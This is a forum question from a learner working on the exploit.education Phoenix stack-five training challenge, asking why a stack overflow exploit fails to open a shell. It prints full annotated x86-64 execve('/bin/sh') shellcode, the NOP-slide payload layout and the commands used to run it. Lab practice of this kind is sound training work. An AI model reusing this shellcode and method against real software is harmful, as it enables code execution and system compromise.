13Tem
Exploit education stack-five: trouble opening shell
Im trying the phoenix vm, challenge stack-five on exploit.education (http://exploit.education/phoenix/stack-five/). I run onto a problem while exploiting a stack overflow. The challenge is run execve('/bin/sh') through shellcode. I grabbed the shellcode from shellstorm (http://shell-storm.org/shellcode/files/shellcode-603.php). The shellcode consists of:
[NOP slide]
(debug int3 \xcc)
"\x48\x31\xd2" // xor %rdx, %rdx
"\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
"\x48\xc1\xeb\x08" // shr $0x8, %rbx
"\x53" // push %rbx
"\x48\x89\xe7" // mov %rsp, %rdi
"\x50" // push %rax
"\x57" // push %rdi
"\x48\x89\xe6" // mov %rsp, %rsi
"\xb0\x3b" // mov $0x3b, %al
"\x0f\x05"; // syscall
(debug int3 \xcc)
[padding]
[override rip pointing to the middle of the NOP slide]
I have tested int3's before and after the shellcode and all seems fine, they both trigger outside and inside gdb and therefore I infer that the shellcode is being executed but i cannot get the shell open.
I'm using this commands:
cat | /opt/phoenix/amd64/stack-five < exploit
cat exploit - | /opt/phoenix/amd64/stack-five
Neither of them gets the shell.
Example of execution
user@phoenix-amd64:~$ cat exploit - | /opt/phoenix/amd64/stack-five
cat exploit - | /opt/phoenix/amd64/stack-five
Welcome to phoenix/stack-five, brought to you by https://exploit.education
[ 7018.986649] traps: stack-five[433] trap int3 ip:7fffffffe68e sp:7fffffffe6c8 error:0
whoami
Trace/breakpoint trap
This int3 is AFTER the shellcode.
Some idea of what's wrong?
